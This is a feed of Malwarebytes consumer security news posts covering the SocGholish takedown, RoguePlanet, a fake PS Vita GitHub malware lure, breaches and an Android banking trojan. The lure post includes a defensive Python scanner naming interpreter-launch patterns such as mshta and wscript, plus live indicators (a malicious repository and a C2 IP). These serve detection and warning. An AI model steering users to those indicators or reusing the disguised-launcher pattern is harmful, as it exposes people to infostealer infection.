Malware Bytes

Nearly 15,000 infected websites cleaned in SocGholish crackdown

Malware Bytes Security - Fri, 06/19/2026 - 12:05pm

We’re always happy to end the week with some positive news. A law enforcement action called Operation Endgame just delivered a major win against the long‑running SocGholish (aka FakeUpdates) operation.

SocGholish is a malware framework that has been active since at least 2017 and is best known for abusing hacked, legitimate WordPress sites to push fake browser and software updates to visitors. When a user clicks one of these convincing “update now” prompts, the malware opens a backdoor on the system, giving attackers initial access that is often used to deploy ransomware and other malicious software. The operation has been linked to the Russian cybercriminal group Evil Corp, previously associated with Zeus and Dridex malware, as well as major ransomware and money‑laundering schemes.

This week, Dutch police and the Public Prosecution Service, working with the Royal Canadian Mounted Police, FBI, German Federal Criminal Police Office, Europol, and Eurojust, struck directly at SocGholish’s infrastructure. As part of Operation Endgame, they took down 106 servers and domains and cleaned 14,971 infected WordPress sites that had been silently redirecting visitors into the FakeUpdates trap.

Investigators say they found exposed login credentials for around 1.4 million WordPress sites. To check whether any passwords associated with your email address have been exposed in a breach, use Malwarebytes Digital Footprint Scanner.

Dutch authorities also used their hacking powers to remove backdoors and malware from compromised sites and notified affected site owners, urging them to update WordPress, enable multi-factor authentication (MFA), and change passwords.

Authorities say the infected sites included everyday businesses such as restaurants and car garages, meaning visitors could have been exposed to malware simply by browsing trusted local websites.

The scale and intent matter here. Endgame is billed as the largest international operation against ransomware and cybercrime to date, and this SocGholish takedown specifically disrupts a key infection chain used by multiple ransomware groups. By breaking the link between thousands of everyday websites and a sophisticated malware‑as‑a‑service ecosystem, law enforcement has reduced the pool of future victims and increased the cost of operating for Evil Corp and its partners.

So, as you head into the weekend, here’s a malware story where the good guys actually pushed back and made it hurt.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

Apple patches Beats Studio Buds flaw that could turn earbuds into a wiretap

Malware Bytes Security - Fri, 06/19/2026 - 7:47am

Apple has patched a Bluetooth flaw in Beats Studio Buds that could potentially turn your earbuds into a nearby wiretap.

When you buy a pair of Bluetooth earbuds, you expect them to play your music and your calls—not someone else’s. But a vulnerability in Apple’s Beats Studio Buds shows how that trust can be abused, turning everyday audio gear into a potential eavesdropping tool for anyone close enough and skilled enough to exploit it.

The vulnerability is tracked as CVE-2025-20701. Researchers disclosed flaws in devices built on Airoha system-on-a-chip (SoC) parts at a security conference in Germany in 2025. Because Airoha chips are used in a wide range of audio products, the issue affected multiple devices, including Beats Studio Buds.

The researchers also showed how the vulnerability could be combined with flaws they found in the same Airoha component. By chaining these flaws, attackers could:

  • Eavesdrop via headphone microphones.
  • Extract pairing keys.
  • Impersonate trusted headphones.
  • Compromise the user’s phone, enabling call hijacking, contact extraction, triggering voice assistants, and more.

The good news is that these attacks are not easy to pull off. Exploitation is complex, and the attacker must be within Bluetooth range of the target device.

Basically, CVE-2025-20701 is a flaw in the authentication process and affects devices that are not yet paired and are actively looking for something to connect to. In a normal scenario, your headphones and your phone go through a pairing process that establishes keys and trust before any sensitive operations—like using the microphone—are allowed.

In this case, devices in pairing mode did not properly verify who they were talking to. That opened a window where any nearby attacker could pose as a legitimate partner and connect to the earbuds before the user completes the pairing process.

As Apple describes it:

“An attacker within Bluetooth range may be able to listen through the microphone of a device which is not yet paired and actively seeking pair requests.”

How to stay safe

To address this vulnerability, Apple shipped Beats Firmware Update 1B211, which rolls out automatically once the earbuds are near and connected to an iPhone, iPad, or Mac.

For the average user, the need for physical proximity, specialized hardware and software, and some patience means opportunistic criminals are more likely to stick with phishing and credential stuffing than stalking Bluetooth signals in public spaces.

But for a motivated attacker targeting a high-profile individual, this is exactly the kind of bug they’d use.

There is no “Update now” button, but if you own Beats Studio Buds and use them with an iPhone, iPad, or Mac, you should automatically receive the update when:

  • The earbuds are paired with your Apple device
  • They are in their charging case, with the lid closed
  • The case and buds have sufficient charge, and the Apple device is nearby with Bluetooth enabled

To check whether you’re protected:

  • On iOS or iPadOS, go to Settings > Bluetooth
  • Tap the info icon next to your Beats Studio Buds
  • Look at the firmware or version number. It should read 1B211 if the security update has been applied. If it says anything else, your earbuds may not have received the update yet. If you see an older version, keep the earbuds in their case near your iPhone, iPad, or Mac for a while to give them time to update. This can take some time and may happen silently in the background, so checking again later is worth the effort.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Microsoft working on a fix for RoguePlanet, a flaw that grants full PC control

Malware Bytes Security - Thu, 06/18/2026 - 8:58am

A publicly available exploit called RoguePlanet can give attackers the highest level of access on Windows systems. Microsoft has confirmed the vulnerability and says it’s working on a security update.

RoguePlanet is tracked under CVE-2026-50656, where it’s described as a Microsoft Defender Elevation of Privilege (EoP) vulnerability.

In its advisory, Microsoft says:

“Microsoft is aware of an elevation of privilege in the Microsoft Malware Protection Engine in Microsoft Defender publicly referred to as “RoguePlanet”. We are working to provide a high quality security update that addresses this vulnerability. We will provide information in this CVE when the update is available.”

If successfully exploited, RoguePlanet can allow an attacker to elevate privileges from a standard user account to NT AUTHORITY\SYSTEM, the highest privilege level on Windows.

This means an attacker who manages to get access to a standard user account on your computer could use the vulnerability to gain complete control of the system. They don’t need advanced hacking skills or administrator permission to do this.

The published exploit does depend on a race condition, though, so whether it succeeds hinges on the precise timing of two events. The researcher wrote:

“I have managed to get a 100% success rate on some machines while it struggled to work on others.”

According to the researcher, the problem lies in a high-level part of the Microsoft Defender code, which may help to explain why Microsoft says it’s working on a “high quality security update.”

This same researcher has submitted three earlier Microsoft Defender vulnerabilities known as BlueHammer (CVE-2026-33825), UnDefend (CVE-2026-45498), and RedSun (CVE-2026-41091), as well as four other Windows zero-days, all of which have since been patched by Microsoft.

How to protect your machine

The exploit reportedly works whether you’re using active protection or not, so disabling Microsoft Defender is not a solution. But there are a few things you can do to protect your machine:

  • Look out for a Microsoft security update addressing this vulnerability and install it as soon as it becomes available.
  • Back up your important data on a platform or device that is not directly connected to your computer.
  • Be careful about downloading executable files from unknown sources or running files that are recommended to you without you asking for them.
  • Do not rely on Microsoft Defender as your only anti-malware solution. Malwarebytes detects RoguePlanet.exe (the exploit code) based on its behavior.

Obviously, we’ll keep you posted about this and other security issues, so stay tuned.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review

Retro gaming fans are the new target for fake GitHub malware

Malware Bytes Security - Thu, 06/18/2026 - 7:27am

Retro gaming fans should be careful with GitHub projects that claim to be tools or plugins for their consoles. Attackers can disguise ordinary computer malware as homebrew software, and the technique works against any retro platform with an active modding scene, not just one console.

We recently looked at one example aimed at PlayStation Vita owners: a fake project that pretends to be a free audio tool but actually runs Windows malware on your computer.

The project, called EQVita, looks like a normal homebrew plugin. It has a polished README, a download button, screenshots, and a tidy layout. But the file you download doesn’t contain anything for a Vita at all. It contains three Windows files, and the harmless-looking text file among them is actually a hidden script that quietly connects to the attacker’s server once you run it.

This isn’t a one-off. Other researchers have observed attackers using fake GitHub repositories—dressed up with AI-generated descriptions—to spread a type of malware called SmartLoader, which then pulls in password and wallet-stealing malware such as Lumma Stealer. The EQVita download uses the same method, repackaged to appeal to retro gaming fans.

Take a look at the comparison below. On the left we have a fake GitHub repository, on the right a real one.

There’s even a small trick in the version number. The real EQVita is on version 1.10, while the fake is labeled 1.3. At a glance, 1.3 may appear newer—but it isn’t. In software, 1.10 comes after 1.9, so the real project is the more up-to-date one. The fake just borrows a number that looks current.
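The version trick above comes down to how the numbers are compared. The following is an added example (not code from the article or the EQVita project) that contrasts the at-a-glance string ordering with a per-component numeric comparison, and treats trailing zeros (1.10 versus 1.10.0) as the same release:

```python
def parse_version(text):
    """Split a dotted version such as '1.10' into integer components so that
    each component is compared numerically rather than character by character."""
    parts = []
    for piece in text.strip().lstrip("vV").split("."):
        if not piece.isdigit():
            raise ValueError(f"non-numeric version component: {piece!r}")
        parts.append(int(piece))
    # Trailing zero components carry no meaning: 1.10 and 1.10.0 are one release.
    while len(parts) > 1 and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def is_newer(candidate, reference):
    """True if `candidate` is a strictly newer release than `reference`."""
    return parse_version(candidate) > parse_version(reference)


def naive_string_says_newer(candidate, reference):
    """The mistaken 'at a glance' comparison: plain string ordering, which
    judges '1.3' newer than '1.10' because '3' sorts after '1'."""
    return candidate > reference


if __name__ == "__main__":
    # Constructed values taken from the article's comparison of the two repositories.
    real, fake = "1.10", "1.3"
    print("numeric: fake newer than real?", is_newer(fake, real))            # False
    print("string:  fake newer than real?", naive_string_says_newer(fake, real))  # True
```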

Why this targets the Vita community

If you’re not into retro consoles, the PS Vita might not mean much to you. But for a large and active community, it’s a big deal, and that makes it a target.

I’ll admit a soft spot here: I bought my own Vita 1000 second hand about ten years ago, and it still runs beautifully. It comes off the shelf every now and then, mostly because the library is so deep there’s always something worth coming back to. I’m clearly not alone.

Even though Sony stopped making the Vita years ago, fans have kept it alive by writing their own software for it: emulators, file managers, and plugins. A modded Vita can run its own PSP games at full speed and emulate older systems like the SNES, Game Boy Advance, and Sega Genesis, which turns the handheld into a do-everything retro machine. In 2026 the scene is thriving, with active developers and even homebrew contests with cash prizes.

That demand shows up in the price, too. With no new units made since 2019, working Vitas have become a sought-after retro item, and resale prices have climbed across the major marketplaces over the past year—the older OLED model, prized by modders for its firmware, has risen the most. In other words, more people than ever are buying a Vita specifically to mod it, which means more people hunting for plugins and tools to install.

That enthusiasm is exactly what attackers abuse. Homebrew users are used to downloading files from GitHub, dropping them into folders, and running them. The whole hobby runs on trusting code from individual developers. Scammers know this, so a fake “Vita plugin” is an easy way to get people to run something they normally wouldn’t.

How the scam works

The download, EQ_Vita_v1.3.zip, contains three files:

  • Launch.bat
  • luajit.exe
  • x64.txt

Here’s the clever part. luajit.exe is a real, harmless program that runs scripts. The batch file simply tells it to open x64.txt. Despite the .txt name, that file isn’t text at all—it’s a hidden script, and LuaJIT runs it. Calling it .txt is what makes it look harmless and easy to scroll past. Researchers found the same setup in the SmartLoader campaign: the only dangerous file in the download is the disguised script, and everything around it is legitimate.
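The giveaway in this layout is an interpreter being handed a file whose extension does not match what it normally executes. The triage helper below is an added example written for this article, not code from the article or from the EQVita repository; the launcher and archive listings it scans are constructed to mimic the described layout, not the real contents of EQ_Vita_v1.3.zip, and the interpreter table is an assumption of this example.

```python
import shlex
from pathlib import PureWindowsPath

# Script interpreters commonly bundled in "just run the launcher" lures, mapped to
# the extensions a script for that interpreter would normally carry (assumed list).
INTERPRETER_EXTENSIONS = {
    "luajit.exe": {".lua"},
    "lua.exe": {".lua"},
    "python.exe": {".py", ".pyw"},
    "pythonw.exe": {".py", ".pyw"},
    "node.exe": {".js", ".mjs"},
    "wscript.exe": {".vbs", ".js", ".wsf"},
    "cscript.exe": {".vbs", ".js", ".wsf"},
    "powershell.exe": {".ps1"},
    "mshta.exe": {".hta"},
}

# Extensions that make a file look inert to someone scrolling past it.
INERT_LOOKING = {".txt", ".log", ".dat", ".md", ".jpg", ".png", ".ini", ".cfg"}


def _split_cmd(line):
    # Batch syntax is not POSIX shell, but non-POSIX shlex keeps quoted arguments
    # together, which is all the "interpreter + argument" check needs.
    try:
        return shlex.split(line, posix=False)
    except ValueError:
        return line.split()


def suspicious_interpreter_launches(bat_text):
    """Return one finding per line that hands a known interpreter a file whose
    extension is not one that interpreter normally executes."""
    findings = []
    for lineno, raw in enumerate(bat_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.lower().startswith(("rem ", "::", "@echo", "echo ")):
            continue
        tokens = _split_cmd(line.lstrip("@"))
        # Drop "start", its switches, "call", and an empty window title ("").
        while tokens and tokens[0].lower() in ("start", "call", "/b", "/min", "/wait"):
            tokens.pop(0)
        if tokens and tokens[0] == '""':
            tokens.pop(0)
        if not tokens:
            continue
        exe = PureWindowsPath(tokens[0].strip('"')).name.lower()
        expected = INTERPRETER_EXTENSIONS.get(exe)
        if expected is None:
            continue
        for arg in tokens[1:]:
            arg = arg.strip('"')
            if arg.startswith(("-", "/")):
                continue  # interpreter switch, not the script path
            ext = PureWindowsPath(arg).suffix.lower()
            if ext and ext not in expected:
                findings.append({
                    "line": lineno,
                    "interpreter": exe,
                    "script": arg,
                    "extension": ext,
                    "disguised": ext in INERT_LOOKING,
                })
            break  # the first non-switch argument is the script
    return findings


def archive_red_flags(file_names):
    """Flag an archive that bundles a launcher and a script interpreter but no
    file carrying that interpreter's normal script extension."""
    names = [PureWindowsPath(n).name.lower() for n in file_names]
    suffixes = {PureWindowsPath(n).suffix for n in names}
    has_launcher = bool(suffixes & {".bat", ".cmd"})
    flags = []
    for exe, expected in INTERPRETER_EXTENSIONS.items():
        if exe in names and has_launcher and not (suffixes & expected):
            flags.append(f"{exe} bundled with a launcher but no "
                         f"{'/'.join(sorted(expected))} script")
    return flags


# Constructed launcher mimicking the layout the article describes.
SAMPLE_LAUNCH_BAT = """@echo off
cd /d "%~dp0"
start "" luajit.exe x64.txt
"""

# Constructed benign launcher for contrast: the interpreter receives a real script.
SAMPLE_BENIGN_BAT = """@echo off
python.exe build_vpk.py --out release
"""

if __name__ == "__main__":
    for f in suspicious_interpreter_launches(SAMPLE_LAUNCH_BAT):
        print(f"line {f['line']}: {f['interpreter']} runs {f['script']} "
              f"({'disguised' if f['disguised'] else 'odd'} extension {f['extension']})")
    print(archive_red_flags(["Launch.bat", "luajit.exe", "x64.txt"]))
```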

So nothing in the download looks dangerous on its own. There’s no obvious installer and no scary-looking app—just a trusted tool being used to run someone else’s code.

We watched what happened when it ran. First, the script checked where in the world the computer was. Then it quietly contacted a server on the internet and sent it data, using a web address scrambled into a meaningless-looking string. The server answered back.

An audio plugin has no reason to do any of that. This is how a malware “loader” behaves: it phones home to the attacker’s server to receive instructions and fetch its next piece of malware. In this campaign, that next piece is usually a stealer—malware that hunts for cryptocurrency wallets, saved browser passwords, and login codes.

Malwarebytes blocks this threat, so protected users are stopped before the file can run.

How to spot the fake

Most Vita plugins are installed on the Vita, using tools like VitaShell or Autoplugin, and they come as Vita files (the kind ending in .skprx or .vpk).

Some legitimate tools in the scene—installers, file-transfer helpers, build tools—do run on a PC, so a Windows program isn’t automatically bad. The key is to check before you run it.

Is it well known? Is it widely used? Is it recommended by trusted community sources, or did you just stumble onto it in an unfamiliar repository? A “plugin” that quietly leans on a .bat file to launch a hidden program is exactly what that check is meant to catch.

A few habits help:

  • Match the file to the device, and verify PC tools. Most Vita plugins are Vita files, not Windows programs. Some legitimate tools do run on your PC, so don’t panic at an .exe or .bat, but check that it’s a well-known, trusted tool before running it.
  • Be wary of “Download Now” polish. Real homebrew READMEs are written for users like other developers. In this campaign, the fake repositories lean on AI-generated text, which tends to read like marketing: heavy on emoji, friendly phrasing, and a big download button. A project that pushes you to click fast deserves a second look.
  • Stick to trusted sources. Established community hubs and trusted-source lists exist for a reason. Check before you download.
  • Add another layer of protection. Malwarebytes Browser Guard can help block known malicious pages and downloads before they reach you.

What to do if you’ve already run it

If you have downloaded and run EQ_Vita_v1.3.zip, you should treat the computer as compromised. Here’s what to do:

  • Run a full malware scan with up-to-date security software.
  • Because this campaign delivers information-stealing malware, change your important passwords from a different, clean device, and review your accounts for unauthorized logins.
  • If you keep any cryptocurrency on that computer, move your funds using a different, clean device and rotate your keys and seed phrases.
  • Check your two-factor authentication (2FA) settings, as stealers can also target 2FA data.
  • Finally, delete the three files and report the GitHub repository so it can be taken down.

Why this scam works

It works because it doesn’t look like a scam. It lives on GitHub, where homebrew users already place their trust. It uses a real, harmless tool to do its dirty work. And it hides the dangerous part inside a file that looks like plain text. None of those tricks is clever on its own, but together they slip right past the quick checks most people actually do.

What makes this one worth noting is where it’s aimed. Retro communities run on goodwill—volunteers who keep old hardware alive, share their work for free, and vouch for one another’s tools. That same trust is what this campaign exploits, and every fake repository that slips through makes the next genuine project a little harder to trust.

The best defense is the one these communities already have: trusted-source lists, established wikis, and people who test things and report back. Verify where a file comes from before you run it, and when something doesn’t add up, say so. That habit is what keeps the scene safe for everyone in it.

Indicators of Compromise (IOCs)

Domains

https://github.com/Voistace/EQVita
https://voistace.github.io

IP

85.137.52.21 (C2)


Kodak confirms breach as ShinyHunters’ leak threat reaches deadline

Malware Bytes Security - Thu, 06/18/2026 - 5:52am

The Eastman Kodak Company (Kodak) confirmed to BleepingComputer that it is investigating a security breach after the ShinyHunters extortion group claimed responsibility for the incident.

Kodak is the latest organization to land on the group’s leak site. ShinyHunters claims it stole more than 2.2 million records and threatened to publish the data unless the company responded by June 18.

“Over 2.2 million records containing customer PII and other internal corporate data was compromised. This is a final warning to reach out by 18 June 2026 before we leak along with several annoying (digital) problems that’ll come your way.”

Kodak has now confirmed a data breach, while also saying the incident was limited in scope, contained, and did not pose a threat to its systems or operations.

ShinyHunters has been busy making the same point across multiple victims: modern extortion is often less about ransomware (encryption) and more about access, stealing valuable data, and applying pressure.

ShinyHunters claims it stole customer information and internal corporate data, but has not publicly provided proof. That’s a common pattern for extortion groups. They make public claims, set a deadline, and use the threat of a data leak to pressure victims before the full facts are known.

Kodak told SecurityWeek that an unauthorized third party gained access to a limited amount of company data, and that the incident appears to have been contained. The company said it brought in external cybersecurity experts, notified law enforcement, and believes there is no threat to its systems or operations.

It’s not yet known how the attackers gained entry to Kodak’s systems, but the extortion group is well-known for social engineering, bribery, and utilizing zero-day vulnerabilities to perform supply-chain attacks. The investigation is ongoing.

How to stay safe

While Kodak works to determine who was affected and exactly what information was accessed, there’s no reason to panic. But there are a few things you can do:

  • Change the password on your Kodak account and make sure you haven’t reused the same password on other accounts.
  • Turn on multi-factor authentication (MFA) wherever possible, to ensure that a stolen password is not enough to take over your account.
  • If you’re in the US, consider placing a credit freeze with Equifax, Experian, and TransUnion. A credit freeze helps prevent identity thieves from opening new accounts in your name by blocking lenders from accessing your credit file.
  • Depending on the information involved, Kodak may offer affected customers free credit monitoring. Even if it doesn’t, you may want to consider identity monitoring services, which can alert you if your personal information appears in suspicious places or is used to open accounts, apply for credit, or commit fraud.
  • Check your Digital Footprint regularly to see if your personal details have been exposed.

Cybercriminals often exploit the confusion that follows a breach. They know victims will be expecting emails and updates from the affected company, making phishing messages more convincing.

Monitor Kodak’s official website for updates, and be skeptical of unsolicited emails, texts, or phone calls that reference the incident. Look for inconsistencies, unusual sender addresses, and strange links, and watch out for the two biggest warning signs: pressure to act immediately and requests for money, passwords, or personal information.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Roblox developers are losing entire games to malware attacks

Malware Bytes Security - Wed, 06/17/2026 - 4:22pm

Account theft usually ends with someone losing a password. This one ends with hackers walking off with the entire game.

Developers behind some of Roblox’s millions of games told 404 Media that attackers persuaded them to run a single file. Then they watched their group, their game, and their Robux (in-platform currency) balance vanish into someone else’s account within hours. In several cases, Roblox support didn’t help them get the games back until a reporter called the company for comment.

From beaming to hostile takeover

Roblox attacks used to be opportunistic. “Beamers” targeted individual players to steal rare hats, limited items, and accounts, then resold them. The pattern has shifted. The new targets are developer accounts, and the prize is the game itself.

Ioannis Matziaris told 404 Media that his two 20-year-old sons spent five years building a Roblox game called The Shadow Network. In April, attackers approached one of them with a job offer and convinced him to run a particular file. It was malware. The attackers stole control of the game, the group’s Roblox account, and their Robux balance.

Another developer, Jovan Rai, received the same project-manager job pitch. This time, the attackers were impersonating Cheesy Studios, the Matziaris brothers’ company, to lend the offer credibility. The 15-year-old was earning roughly 10,000 Robux (around $38) per day from his game. He spent more than 30 days trying to recover it through Roblox support before media attention helped move the case forward.

The malware behind the theft

Developer Mohamed Kaparoza described how the attack worked. Attackers contacted him on Discord, dangled a project-manager role, and asked him to install a Python package called “robase,” which they claimed was a database tool. Shortly after installing it, he was logged out of Roblox on both his PC and his phone. His Discord account went with it, and his two-step verification settings and passkey were changed.

This is a case of session-token theft, rather than credential theft. Once an infostealer steals an authenticated browser session, attackers can often bypass security measures such as two-factor authentication (2FA) because they are reusing a session that has already been authenticated.

The technique itself isn’t new. We reported on a similar campaign in January 2025 that targeted Roblox players with offers to beta test new games. The “installer” was actually an infostealer designed to steal data, including Discord and Steam sessions, and cryptocurrency wallet information.

What developers can do

If you build Roblox games, the defensive advice is unglamorous and mostly behavioral.

  • Treat unsolicited Discord job offers with caution. If a stranger asks you to install a “database tool,” a custom installer, or any file at all, do not run it.
  • Developers who need to test unfamiliar software should do so in an isolated environment, such as a virtual machine, rather than on a device where they are signed in to Roblox, Discord, GitHub, or other important accounts.
  • Review active Roblox sessions and signed-in devices regularly, and switch on Roblox’s Enhanced Protection features where available. They won’t stop session-stealer malware, but they can help protect against many other forms of account compromise.
  • If the worst happens, document everything as early as possible. Keep records of messages, screenshots, account changes, and support requests to help with any recovery process.
  • Use security software with real-time protection. Malwarebytes Premium can detect and block infostealers and other malware before they compromise your accounts.


Rokarolla Android malware can take over your phone and steal banking logins

Malware Bytes Security - Wed, 06/17/2026 - 11:34am

Researchers have analyzed a new Android banking Trojan called Rokarolla. It can effectively take over a device, steal banking and crypto login details from more than 200 apps, and quietly monitor much of what you do on your phone.

On an infected device, Rokarolla steals banking and crypto login details. It also uses fake lock-screen overlays to capture your PIN, pattern, or password.

When you open one of the banking or crypto apps on Rokarolla’s target list, the malware downloads and displays a matching fake login page over the real app. Anything you type into the fake page, including usernames, passwords, and card numbers, is sent to the attackers.

Separately, Rokarolla abuses Android’s Accessibility features to monitor activity across the device. It can recognize WhatsApp screens by looking for familiar labels such as “Chats” and “Calls,” extract contact information, read SMS messages, and send new ones. These capabilities can help it intercept one-time passwords (OTPs) and two-factor authentication (2FA) codes.

Rokarolla can take control of text messages and phone calls, helping it block security alerts and hide signs of fraud.

It can also record everything you type and see on the screen. If you copy and paste a cryptocurrency wallet address, the malware can secretly replace it with one belonging to the attackers.

Other features help the malware stay hidden, including the ability to hide its icon, silence the device, turn off Google Play Protect, and prevent the screen from going to sleep.

How it spreads

Rokarolla is distributed through rogue websites, where it is offered as fake versions of popular apps like TikTok or Chrome.

Malwarebytes blocks the download site

Instead of sending you to the official Google Play Store, these malicious sites push you to download the app directly, a process known as sideloading. After you install it, the fake app poses as Google Play Protect and quietly downloads and installs the malware that carries out the attack.

To gain the access it needs, the fake app asks for powerful permissions, including Accessibility access, the permission to read SMS messages, and access to notifications. Because these requests can look legitimate, many users may approve them without realizing the risks.

How to stay safe

To avoid banking Trojans like Rokarolla, there are a few guidelines you should follow:

  • Don’t trust apps that claim to be Google Play Protect or another system component. You should never need to install these manually.
  • Use up-to-date, real-time anti-malware protection with web protection on your devices.
  • Don’t sideload apps that are available on the Google Play Store. While malware can sometimes slip into official stores, the risk is much greater elsewhere.
  • Deny powerful permissions to apps downloaded from links or websites, especially when they ask for Accessibility access, SMS permissions, or the ability to handle calls and that doesn’t match their stated purpose.
  • In fact, any request for Accessibility access should be treated with caution. If an app that is not clearly an accessibility tool asks for it, deny the request and reconsider whether you trust the source.
  • Scrutinize banking and crypto login screens. If something looks off, or you see multiple login prompts, close the app and relaunch it from its official icon.

24 billion stolen records found in giant data dump. Check if you’re affected

Malware Bytes Security - Wed, 06/17/2026 - 6:56am

A newly discovered database containing 24 billion stolen records is a reminder that personal information from data breaches, phishing campaigns, and infostealer infections continues to circulate online.

The collection was briefly exposed on the internet before being taken offline. While researchers can’t confirm exactly whose information was included, the discovery is a good opportunity to check whether your email addresses, passwords, or other personal data have already been exposed.

The best place to start is with Malwarebytes Digital Footprint Portal (DFP), which can show you whether your information has appeared in known data exposures and breaches.

What happened?

Researchers at Cybernews found a publicly exposed Elasticsearch cluster holding more than 8.3 TB of data.

The data, consisting of 24 billion credential records, reportedly came from 36 sources, including numerous Telegram channels, prior breach compilations, collections of infostealer logs, and some datasets apparently exported directly from live servers.

Because the data came from different sources there are some differences in what the records contain and how they are organized.

Some records were structured infostealer logs containing usernames, email addresses, and plaintext passwords, and the associated login URL. Roughly 1.7 billion records came from hacking-related Telegram channels, mainly English and Russian, including at least one focused on stolen credit card data.

The exposed database was hosted on an Elasticsearch cluster. Elasticsearch is a tool used to quickly store and search lots of data. If an Elasticsearch server lacks passwords, authentication, or network restrictions, it can be accessed by anyone who finds it online. Without protections such as passwords or a firewall, anyone can read, copy, change, or even delete its data.

Other documents in the dataset contained information about known vulnerabilities, articles about breaches, and social media posts about cyberattacks. This suggests the owner actively monitors security news and vulnerabilities and enriches the credential hoard with fresh breach information, either for a commercial “monitoring” service or for offensive use.

A few years ago, we wrote about what was called the Mother of All Breaches, whose source was later identified as the data breach search engine Leak-Lookup.

This newly discovered 24‑billion‑record exposure is in the same league as that previous mega‑dump, but appears more heavily weighted toward fresh infostealer logs, rather than older, static breach data.

An infostealer log from a single infected device can include passwords stored across all browsers, active session cookies and tokens (including those that bypass MFA), autofill data, device fingerprints, and sometimes crypto wallets or messaging accounts. The complete bundle is what ends up in logs such as those seen by the Cybernews researchers.

Because the data was taken out of public view soon after the discovery, the researchers were unable to fully retrace everything they had found or determine how many of the records were duplicates. The quick removal is reassuring, since it reduces the chance of cybercriminals finding the database, but reused passwords may still put accounts at risk.

What to do now

It’s good to be aware of how much information about you is out there and who’s gathering it, but it’s even more important to know exactly which information they have, since that is what they can use against you.

Start by checking whether your email address has appeared in known breaches or infostealer logs.

If you discover exposed passwords, change them immediately and make sure you aren’t reusing the same password across multiple accounts.

If you have reused passwords in the past, prioritize updating important accounts such as email, banking, shopping, and social media accounts. Turn on multi-factor authentication (MFA) wherever possible, since it can help protect accounts even if a password has been exposed.

How to protect your data

Because infostealers commonly arrive through malvertising, fake browser updates, and one-click downloads, it’s worth treating ads and pop-ups with healthy skepticism. My personal tip: Never click on sponsored ads. Instead, visit official websites directly and download software only from trusted sources such as official vendor sites or app stores.

Another increasingly popular technique is ClickFix, a social engineering attack that tricks users into infecting their own devices. Never run commands or scripts copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. If a website tells you to execute a command or perform a technical action, check official documentation or contact support before proceeding.

Pirated software, game cheats, and cracked tools are some of the most common delivery methods for infostealers. These downloads often come bundled with malware that installs alongside the software you intended to get. The same caution applies to many browser extensions and add-ons that promise extra features or convenience. Stick to extensions from reputable developers, check reviews and permissions carefully, and avoid installing any add-on that asks for more access than it plausibly needs.

Phishing emails are still a major threat, but many can be spotted if you slow down and verify before clicking. Even if an email looks like it comes from a trusted brand, treat unsolicited attachments and links with caution, especially when they urge you to open a file, install something urgently, or fix a billing issue. If you’re unsure, check the sender address, look for typos or odd phrasing, and confirm the request through a separate channel such as the company’s official website rather than the link in the email.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review

Categories: Malware Bytes

Malwarebytes earns AV-TEST Top Product award, aces other third-party tests

Malware Bytes Security - Wed, 06/17/2026 - 5:41am

Our job is to protect people from online threats, and independent testing is one of the best ways to measure how well we’re doing.

Malwarebytes nabbed AV-TEST’s Top Product award after scoring 17.5 points out of a possible 18 in the research organization’s most recent Windows security test. The award is the latest in a string of endorsements from third-party testers whose ongoing evaluations help keep us sharp.

Here’s a closer look at the results.

AV-TEST Windows Consumer Security Product Test

AV-TEST’s Windows Consumer Security Product Test, which took place in March and April, assessed 14 security applications across three categories: how well they protected Windows PCs from malware, how much they slowed down a device, and how often they raised false alarms.

AV-TEST noted in its synopsis:

“We focused on realistic test scenarios and challenged the products against real-world threats. Products had to demonstrate their capabilities using all components and protection layers.”

To receive the Top Product award, companies had to score 17.5 points or higher out of a total of 18, earning a maximum of six points in each category. Malwarebytes has received a Top Product endorsement from AV-TEST more than a dozen times since it first began taking the test in 2018.

MRG Effitas Consumer Assessment Certification

Malwarebytes once again came out on top in the MRG Effitas Consumer Assessment Certification, which tested eight security products to measure their ability to block malware, protect against phishing, and avoid false positives.

Malwarebytes was the only company to achieve Level 1 Certification, meaning we succeeded in stopping all 300 in-the-wild infections without causing damage to the device or its data, generated zero false positives, and blocked at least 79% of phishing attempts. Our phishing detection rate was 100%.

This certification is particularly impressive because the test used newly discovered malware samples, meaning most security products had not encountered them before.

AVLab Advanced In-the-Wild Malware Test

Continuing our winning streak, Malwarebytes received a perfect score (421/421) in AVLab’s Advanced In-The-Wild Malware Test, earning an “Excellent” certificate. The test applied existing threats currently circulating online, delivered the way a real user would come across them.

To receive the “Excellent” certification, a security product had to stop at least 99.6% of malware threats, either before they could run or during an attack. We detected and blocked every single real-world threat in an average of 0.508 seconds—a full 3 seconds faster than the industry average.

These types of independent assessments are important. They keep us on top of our game, which in turn keeps our customers safe.

“Free World Cup stream” sites are serving scams, not football

Malware Bytes Security - Tue, 06/16/2026 - 9:00am

With the World Cup on, you’ll find no shortage of websites promising every match, live, in HD, for free. They look convincing, usually with a video player, a “Live Stream Available” indicator, a row of server buttons, maybe a match schedule, and a “Watch Live” button. There’s no signup, no paywall, and seemingly, no catch.

But of course there’s a catch. These sites aren’t really in the business of streaming football. What the page is really built to do is fire pop-ups, hidden ads, and redirects through an advertising network we detect as malicious. Instead of watching the match, visitors end up facing scams, malware, and fraudulent downloads.

Here’s how the scam works and how to stay out of it.

If they’re not real streaming sites, what are they?

We’ve identified more than 40 websites that are effectively identical. They use different World Cup-themed names, but behind the scenes they’re running the same page template, the same code, and the same advertising infrastructure.

A script generates a separate page for every match, making the operation cheap to run and easy to scale.

When a stream appears at all, it’s usually embedded from a third-party piracy service. The real business is the advertising surrounding the player.

A typical page loads eight or more ad and tracking scripts from the same shady network, plus a handful of other ad domains. The hub the whole page is wired to is a domain we detect as malicious. Your data is the product; the “stream” is the bait.

Why these sites are dangerous, not just annoying

It’s tempting to shrug this off as the usual price of free streams. But it’s worse than facing a few annoying ads.

